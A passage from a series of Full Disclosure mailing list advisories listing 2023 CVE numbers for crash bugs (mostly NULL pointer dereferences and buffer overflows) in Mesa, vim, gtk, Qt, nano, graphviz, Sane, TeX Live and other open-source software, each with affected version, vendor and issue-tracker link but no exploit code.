[Affected Product Code Base]
Mesa - 23.0.4

[Reference]
https://gitlab.freedesktop.org/mesa/mesa/-/issues/9856

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45913 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Null pointer dereference in Xedit

[Meng Ruijie]

[Vulnerability description]
A NULL pointer dereference in the component /X11/xedit/lisp of Xedit v1.2.3 
allows attackers to cause a Denial of Service (DoS) via a crafted lisp.lsp file.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
Xedit

[Affected Product Code Base]
Xedit - 1.2.3

[Reference]
https://gitlab.freedesktop.org/xorg/app/xedit/-/issues/1

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45916 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] NULL pointer dereference in tgetstr() of ncurses

[Meng Ruijie]

[Vulnerability description]
ncurses v6.4-20230610 was discovered to contain a NULL pointer dereference via 
the function tgetstr().

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
ncurses

[Affected Product Code Base]
ncurses - 6.4-20230610

[Reference]
https://lists.gnu.org/archive/html/bug-ncurses/2023-06/msg5.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45918 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Buffer Overflow in glXQueryServerString() of mesa

[Meng Ruijie]

[Vulnerability description]
freedesktop Mesa v23.0.4 was discovered to contain a segmentation violation via 
the function glXQueryServerString().

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
freedesktop

[Affected Product Code Base]
Mesa - 23.0.4

[Reference]
https://gitlab.freedesktop.org/mesa/mesa/-/issues/9858

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45919 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Null pointer deference in XGetWMHints() of Xfig

[Meng Ruijie]

[Vulnerability description]
Xfig v3.2.8 was discovered to contain a segmentation violation via the function 
XGetWMHints().

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
SourceForge

[Affected Product Code Base]
Xfig - 3.2.8

[Reference]
https://sourceforge.net/p/mcj/tickets/155/

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45920 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] NULL pointer dereference in the function handle_viminfo_register() of vim

[Meng Ruijie]

[Vulnerability description]
A NULL pointer dereference in the function handle_viminfo_register() of vim 
v9.0 allows attackers to cause a Denial of Service (DoS) via crafted file.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
vim

[Affected Product Code Base]
vim - 9.0

[Reference]
https://github.com/vim/vim/issues/12652

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45921 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] NULL pointer dereference in __glXGetDrawableAttribute() of Mesa

[Meng Ruijie]

[Vulnerability description]
freedesktop Mesa v23.0.4 was discovered to contain a NULL pointer dereference 
via the function __glXGetDrawableAttribute().

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
freedesktop

[Affected Product Code Base]
Mesa - 23.0.4

[Reference]
https://gitlab.freedesktop.org/mesa/mesa/-/issues/9857

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45922 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] NULL pointer dereference in XIQueryDevice() of gnome gtk

[Meng Ruijie]

[Vulnerability description]
gnome gtk 824e9833 was discovered to contain a NULL pointer dereference via the 
function XIQueryDevice().

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
gnome

[Affected Product Code Base]
gtk - 824e9833

[Reference]
https://gitlab.gnome.org/GNOME/gtk/-/issues/5962

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45923 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] NULL pointer dereference in glXGetDrawableScreen() of OpenGL libglvnd

[Meng Ruijie]

[Vulnerability description]
OpenGL libglvnd bb06db5a was discovered to contain a NULL pointer dereference 
via the function glXGetDrawableScreen().

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
OpenGL

[Affected Product Code Base]
libglvnd - bb06db5a

[Reference]
https://gitlab.freedesktop.org/glvnd/libglvnd/-/issues/242

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45924 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in GNU Midnight at /tty/x11conn.c

[Meng Ruijie]

[Vulnerability description]
GNU Midnight Commander v4.8.29-146-g299d9a2fb was discovered to contain a 
segmentation violation via the function x_error_handler() at /tty/x11conn.c.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
GNU

[Affected Product Code Base]
Midnight Commander - 4.8.29-146-g299d9a2fb

[Reference]
https://midnight-commander.org/ticket/4484

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45925 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in gnome gdk-pixbuf

[Meng Ruijie]

[Vulnerability description]
gnome gdk-pixbuf 4fc028aa was discovered to contain a segmentation violation 
via the function gdk_pixbuf_io_init_modules().

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
gnome

[Affected Product Code Base]
gdk-pixbuf - 4fc028aa

[Reference]
https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/230

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45926 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] arithmetic exception in S-lang via the function tt_sprintf()

[Meng Ruijie]

[Vulnerability description]
S-Lang v2.3.2 was discovered to contain an arithmetic exception via the 
function tt_sprintf().

[VulnerabilityType Other]
FPE

[Vendor of Product]
S-Lang

[Affected Product Code Base]
S-Lang - 2.3.2

[Reference]
http://lists.jedsoft.org/lists/slang-users/2023/003.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45927 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in gnome gtk via init_randr15() at gdkscreen-x11.c

[Meng Ruijie]

[Vulnerability description]
gnome gtk f2a28891 was discovered to contain a segmentation violation via the 
function init_randr15() at gdkscreen-x11.c.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
gnome

[Affected Product Code Base]
gtk - f2a28891

[Reference]
https://gitlab.gnome.org/GNOME/gtk/-/issues/5984

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45928 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] SEGV in S-Lang via fixup_tgetstr()

[Meng Ruijie]

[Vulnerability description]
S-Lang v2.3.2 was discovered to contain a SEGV via the function fixup_tgetstr().

[VulnerabilityType Other]
SEGV

[Vendor of Product]
S-Lang

[Affected Product Code Base]
S-Lang - 2.3.2

[Reference]
http://lists.jedsoft.org/lists/slang-users/2023/002.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45929 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in gnome gtk via parse_settings() at xsettings-client.c

[Meng Ruijie]

[Vulnerability description]
gnome gtk ac60bc60 was discovered to contain a segmentation violation via the 
function parse_settings() at xsettings-client.c.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
gnome

[Affected Product Code Base]
gtk - ac60bc60

[Reference]
https://gitlab.gnome.org/GNOME/gtk/-/issues/5983

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45930 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] NULL pointer dereference in freedesktop Mesa via check_xshm()

[Meng Ruijie]

[Vulnerability description]
freedesktop Mesa v23.0.4 was discovered to contain a NULL pointer dereference 
via the function check_xshm().

[Vulnerability Type]
NULL pointer dereference

[Vendor of Product]
freedesktop

[Affected Product Code Base]
Mesa - 23.0.4

[Reference]
https://gitlab.freedesktop.org/mesa/mesa/-/issues/9859

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45931 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in nano via read_the_list()

[Meng Ruijie]

[Vulnerability description]
Nano v6.2 was discovered to contain a segmentation violation via the function 
read_the_list().

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
nano

[Affected Product Code Base]
nano - 6.2

[Reference]
https://savannah.gnu.org/bugs/index.php?64465

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45932 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] NULL pointer dereference in QT via the function QXcbConnection::initializeAllAtoms()

[Meng Ruijie]

[Vulnerability description]
QT v6.2, v6.5, and v6.6 was discovered to contain a NULL pointer dereference 
via the function QXcbConnection::initializeAllAtoms().

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
qt

[Affected Product Code Base]
qt - 6.6, 6.5, 6.2

[Reference]
https://bugreports.qt.io/browse/QTBUG-115599

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45935 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Buffer Overflow in graphviz via via a crafted config6a file

[Meng Ruijie]

[Vulnerability description]
Buffer Overflow vulnerability in graphviz v.2.43.0 allows a remote attacker to 
execute arbitrary code via a crafted config6a file.

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
graphviz

[Affected Product Code Base]
graphviz - 2.43.0

[Reference]
https://gitlab.com/graphviz/graphviz/-/issues/2441

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46045 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in MiniZinc via a crafted .mzn file

[Meng Ruijie]

[Vulnerability description]
Null pointer deference happens in MiniZinc v.2.7.6 via a crafted .mzn file.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
MiniZinc

[Affected Product Code Base]
MiniZinc - 2.7.6

[Reference]
https://github.com/MiniZinc/libminizinc/issues/730

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46046 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in Sane via a crafted config file

[Meng Ruijie]

[Vulnerability description]
A null pointer deference occurred in Sane v.1.2.1 via a crafted config file to 
the sanei_configure_attach() function.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
sane

[Affected Product Code Base]
sane - 1.2.1

[Reference]
https://gitlab.com/sane-project/backends/-/issues/708

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46047 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in tex-live via a crafted cmr10.pfb

[Meng Ruijie]

[Vulnerability description]
A null pointer deference occurred in tex-live 944e257 via a crafted cmr10.pfb 
config file.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
tex-live

[Affected Product Code Base]
tex-live - 944e257

[Reference]
https://tug.org/pipermail/tex-live/2023-August/049400.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46048 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in LLVM

[Meng Ruijie]

[Vulnerability description]
A null pointer deference existed in LLVM v.15.0.0 via a crafted pdflatex.fmt 
file.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
llvm

[Affected Product Code Base]
llvm - LLVM-15

[Reference]
https://github.com/llvm/llvm-project/issues/67388

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46049 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in MiniZinc via a crafted Preferences.json file

[Meng Ruijie]

[Vulnerability description]
A null pointer deference existed in MiniZinc v.2.7.6 via a crafted 
Preferences.json file.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
MiniZinc

[Affected Product Code Base]
MiniZinc - 2.7.6

[Reference]
https://github.com/MiniZinc/libminizinc/issues/729

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46050 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] null pointer deference in tex-live

[Meng Ruijie]

[Vulnerability description]
A null pointer deference existed in tex-live v.944e257 via a crafted file to 
the texk/web2c/pdftexdir/tounicode.c function.

[VulnerabilityType Other]
null pointer deference

[Vendor of Product]
tex-live

[Affected Product Code Base]
tex-live - 944e257

[Reference]
https://tug.org/pipermail/tex-live/2023-August/049406.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46051 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Buffer overflow in Sane

[Meng Ruijie]

[Vulnerability description]
A buffer overflow existed in Sane v.1.2.1 via a crafted config file to the 
init_options() function.

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
sane

[Affected Product Code Base]
sane - 1.2.1

[Reference]
https://gitlab.com/sane-project/backends/-/issues/709

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46052 to this vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/